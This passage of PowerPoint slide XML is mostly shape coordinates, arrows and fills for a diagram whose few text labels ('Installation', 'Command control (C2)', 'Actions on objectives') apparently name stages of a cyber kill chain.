                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197381" y="311677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168970" y="347877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142444" y="385703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117888" y="425097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95388" y="466003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75029" y="508363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56896" y="552121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41076" y="597220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27653" y="643602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16713" y="691210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8445" y="739355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941" y="787325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="835035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="882400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2448" y="929334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7432" y="975752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14897" y="1021568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24784" y="1066696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37037" y="1111052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51599" y="1154549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68413" y="1197102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87422" y="1238626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108569" y="1279035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131797" y="1318243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157049" y="1356165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184268" y="1392716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213398" y="1427810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244380" y="1461361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277159" y="1493285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311677" y="1523494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347877" y="1551905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385703" y="1578431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425097" y="1602987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466003" y="1625488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508363" y="1645847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552121" y="1663979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597220" y="1679800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643602" y="1693223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691210" y="1704162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739355" y="1712431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787325" y="1717934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835035" y="1720730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882400" y="1720876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929334" y="1718428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975752" y="1713443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021568" y="1705979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066696" y="1696091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111052" y="1683838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154549" y="1669276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197102" y="1652462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238626" y="1633453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279035" y="1612306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318243" y="1589078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356165" y="1563826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392716" y="1536607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427810" y="1507478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461361" y="1476495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493285" y="1443717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523494" y="1409199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551905" y="1372998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578431" y="1335172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1602987" y="1295778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625488" y="1254872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645847" y="1212512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1663979" y="1168754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679800" y="1123656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693223" y="1077274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704162" y="1029665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860501" y="860374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029665" y="16713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981521" y="8445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933551" y="2941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885840" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838475" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="70BC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351974" y="6229123"/>
              <a:ext cx="1400175" cy="1400175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1400175" h="1400175">
                  <a:moveTo>
                    <a:pt x="696664" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="650416" y="1715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604764" y="6454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559829" y="14135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515736" y="24677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472606" y="37997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430563" y="54015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389730" y="72647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350228" y="93814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312181" y="117432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275712" y="143420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240943" y="171696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207997" y="202179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176997" y="234786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148066" y="269437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121326" y="306048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96900" y="344540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74911" y="384829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55482" y="426834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38735" y="470474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24793" y="515666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13779" y="562328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5946" y="609627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1380" y="656698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="703419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1723" y="749667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6468" y="795320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14154" y="840254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24699" y="884347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38022" y="927477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54040" y="969520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72674" y="1010354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="1049855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117458" y="1087902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143446" y="1124371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171723" y="1159140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202206" y="1192086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234815" y="1223086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269468" y="1252017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306083" y="1278757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344579" y="1303183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384875" y="1325172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426888" y="1344602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470537" y="1361349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515741" y="1375290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562419" y="1386304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609717" y="1394152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656788" y="1398730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703509" y="1400120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749757" y="1398405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795409" y="1393665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840342" y="1385983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884435" y="1375440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927563" y="1362118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969604" y="1346099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010435" y="1327463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049933" y="1306294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1087977" y="1282672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124441" y="1256680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159205" y="1228399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192145" y="1197910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223139" y="1165296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1252062" y="1130638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278794" y="1094018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303210" y="1055517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325189" y="1015218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344607" y="973201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361341" y="929549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375269" y="884343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386268" y="837664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394115" y="790367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398693" y="743298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400084" y="696580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398369" y="650335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393630" y="604687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1385948" y="559759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375407" y="515672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362086" y="472549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1346069" y="430513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327436" y="389687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306270" y="350193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282652" y="312154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256664" y="275693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1228387" y="240932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197905" y="207994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165297" y="177001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130647" y="148077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094035" y="121343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055543" y="96923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015254" y="74938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973249" y="55513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929610" y="38769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884418" y="24829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837755" y="13815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790456" y="5968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743385" y="1390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696664" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="31736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73780" y="6396228"/>
              <a:ext cx="970788" cy="970788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3328161" y="8018170"/>
            <a:ext cx="146621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Installation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711188" y="7870952"/>
            <a:ext cx="1960245" cy="6946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ts val="2635"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Command</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2635"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(C2)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654410" y="7995005"/>
            <a:ext cx="1390650" cy="694055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45720" marR="5080" indent="-33655">
              <a:lnSpc>
                <a:spcPts val="2630"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="190"/>
              </a:spcBef>
            </a:pP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Actions</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>on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objectives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826002" y="3620134"/>
            <a:ext cx="1418590" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1418589" h="85725">
                <a:moveTo>
                  <a:pt x="1332484" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1351561" y="28574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1361059" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1361059" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351477" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1332484" y="85598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1389464" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1361059" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1389466" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1418209" y="42799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1332484" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1418589" h="85725">
                <a:moveTo>
                  <a:pt x="1361059" y="42799"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1351478" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1361059" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1361059" y="42799"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1418589" h="85725">
                <a:moveTo>
                  <a:pt x="0" y="28448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="57023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351478" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1361059" y="42799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351561" y="28574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28448"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1418589" h="85725">
                <a:moveTo>
                  <a:pt x="1351561" y="28574"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1361059" y="42799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1361059" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351561" y="28574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367778" y="3620134"/>
            <a:ext cx="1510665" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1510665" h="85725">
                <a:moveTo>
                  <a:pt x="1424431" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1443509" y="28574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1453006" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1453006" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1443425" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1424431" y="85598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1481412" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1453006" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1481414" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1510156" y="42799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1424431" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1510665" h="85725">
                <a:moveTo>
                  <a:pt x="1453006" y="42799"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1443426" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1453006" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1453006" y="42799"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1510665" h="85725">
                <a:moveTo>
                  <a:pt x="0" y="28448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="57023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1443426" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1453006" y="42799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1443509" y="28574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28448"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1510665" h="85725">
                <a:moveTo>
                  <a:pt x="1443509" y="28574"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1453006" y="42799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1453006" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1443509" y="28574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0903457" y="3620134"/>
            <a:ext cx="1377950" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1377950" h="85725">
                <a:moveTo>
                  <a:pt x="1320546" y="42799"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1291971" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1349036" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1320546" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1320546" y="42799"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1377950" h="85725">
                <a:moveTo>
                  <a:pt x="1311049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1310992" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1320546" y="42799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1311049" y="28575"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1377950" h="85725">
                <a:moveTo>
                  <a:pt x="1349205" y="28575"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1320546" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1320546" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1349036" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1377696" y="42799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1349205" y="28575"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1377950" h="85725">
                <a:moveTo>
                  <a:pt x="1291971" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1320546" y="42799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1320546" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1349205" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1291971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3" name="object 43"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4019296" y="5086350"/>
            <a:ext cx="9422765" cy="855344"/>
            <a:chOff x="4019296" y="5086350"/>
            <a:chExt cx="9422765" cy="855344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="object 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4062222" y="5086350"/>
              <a:ext cx="9365615" cy="533400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9365615" h="533400">
                  <a:moveTo>
                    <a:pt x="9365107" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9364980" y="533400"/>
                  </a:lnTo>
                </a:path>
                <a:path w="9365615" h="533400">
                  <a:moveTo>
                    <a:pt x="9364091" y="533400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="533400"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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4019296" y="5619750"/>
              <a:ext cx="85725" cy="321945"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="85725" h="321945">
                  <a:moveTo>
                    <a:pt x="0" y="235712"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="42925" y="321437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71458" y="264287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28575" y="264287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28575" y="254733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="235712"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="85725" h="321945">
                  <a:moveTo>
                    <a:pt x="28575" y="254733"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="28575" y="264287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42925" y="264287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28575" y="254733"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="85725" h="321945">
                  <a:moveTo>
                    <a:pt x="57150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="28575" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28659" y="254790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42925" y="264287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="254790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="85725" h="321945">
                  <a:moveTo>
                    <a:pt x="57150" y="254790"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="42925" y="264287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="264287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="254790"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="85725" h="321945">
                  <a:moveTo>
                    <a:pt x="85725" y="235712"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57234" y="254733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="264287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71458" y="264287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="235712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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5138165" y="6911847"/>
            <a:ext cx="1400810" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1400809" h="85725">
                <a:moveTo>
                  <a:pt x="1343406" y="42925"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1314831" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1372065" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343406" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343406" y="42925"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1400809" h="85725">
                <a:moveTo>
                  <a:pt x="1333852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1333909" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343406" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1333852" y="28575"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1400809" h="85725">
                <a:moveTo>
                  <a:pt x="1371896" y="28575"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1343406" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343406" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1372065" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400556" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1371896" y="28575"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1400809" h="85725">
                <a:moveTo>
                  <a:pt x="1314831" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1343406" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1343406" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1371896" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1314831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8743950" y="6887591"/>
            <a:ext cx="1466850" cy="85725"/>
          </a:xfrm>
